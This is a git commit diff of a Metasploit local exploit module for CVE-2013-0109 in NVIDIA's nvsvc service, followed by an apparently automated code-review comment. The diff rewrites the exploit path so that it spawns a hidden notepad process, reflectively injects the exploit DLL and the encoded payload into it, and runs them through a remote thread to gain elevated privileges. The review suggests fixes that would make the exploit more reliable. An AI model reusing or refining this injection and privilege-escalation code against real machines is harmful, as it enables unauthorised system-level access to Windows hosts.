Re-add RDI mixin changes
parent
e22b4ba88c
commit
41c538856a
|
@ -120,12 +120,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
end
|
||||
|
||||
def create_proc
|
||||
windir = expand_path("%windir%")
|
||||
cmd = "#{windir}\\SysWOW64\\notepad.exe"
|
||||
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
|
||||
end
|
||||
|
||||
def is_running?
|
||||
begin
|
||||
status = service_status('nvsvc')
|
||||
|
@ -134,60 +128,39 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_error("Unable to retrieve service status")
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless is_running?
|
||||
print_error("Service not running - attempting to start")
|
||||
res = service_start('nvsvc')
|
||||
case res
|
||||
when 0
|
||||
print_good("Service started")
|
||||
when 1
|
||||
print_status("Service already started")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to start service")
|
||||
end
|
||||
else
|
||||
print_good("Service is running")
|
||||
if is_system?
|
||||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
dll = ''
|
||||
offset = nil
|
||||
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
|
||||
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
|
||||
|
||||
pay = payload.encoded
|
||||
|
||||
bo = dll.index('PAYLOAD:')
|
||||
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
|
||||
dll[bo, pay.length] = [pay].pack("a*")
|
||||
|
||||
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
|
||||
|
||||
pe.exports.entries.each do |entry|
|
||||
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
|
||||
offset = pe.rva_to_file_offset( entry.rva )
|
||||
break
|
||||
end
|
||||
unless check == Exploit::CheckCode::Vulnerable
|
||||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||
end
|
||||
|
||||
print_error("No offset found") unless offset
|
||||
print_status("Launching notepad to host the exploit...")
|
||||
process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
|
||||
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
|
||||
new_pid = create_proc
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
library_path = ::File.join(Msf::Config.data_directory, "exploits",
|
||||
"CVE-2013-0109", "nvidia_nvsvc.x86.dll")
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
if not new_pid
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
|
||||
end
|
||||
print_status("Injecting exploit into #{process.pid} ...")
|
||||
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
|
||||
|
||||
vprint_status("Injecting payload into memory")
|
||||
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
|
||||
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
|
||||
host_process.memory.protect(mem)
|
||||
host_process.memory.write(mem, dll)
|
||||
print_status("Executing exploit...")
|
||||
host_process.thread.create(mem+offset)
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
payload_mem = inject_into_process(host_process, payload.encoded)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
# we want invoked on successful exploitation.
|
||||
print_status("Payload injected. Executing exploit...")
|
||||
host_process.thread.create(exploit_mem + offset, payload_mem)
|
||||
|
||||
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
|
||||
end
|
||||
end
|
||||
|
||||
|
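Review bot: The host process on the new side is started as a bare `notepad.exe` while the library handed to `inject_dll_into_process` is `nvidia_nvsvc.x86.dll`; under an x64 meterpreter session that name resolves to the 64-bit notepad, into which a 32-bit reflective DLL cannot be loaded, whereas the removed `create_proc` pinned `%windir%\SysWOW64\notepad.exe`. If the module's metadata does not already restrict it to x86 sessions (not visible in this hunk), add a guard before the launch, e.g. `fail_with(Exploit::Failure::NoTarget, 'Only x86 sessions are supported') unless session.arch == ARCH_X86`, or select the SysWOW64 binary when the target OS is 64-bit. The hidden notepad process and the `host_process` handle are also never closed after `thread.create`, so a hidden notepad is left behind on every run; either close the handle once the payload has had a chance to run or state in the final `print_good` that the process is intentionally left alive. The service-start logic at the top of `exploit` and the class header begin above this hunk, so whether `is_system?` still aborts already-elevated sessions on the new side cannot be confirmed from here.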
|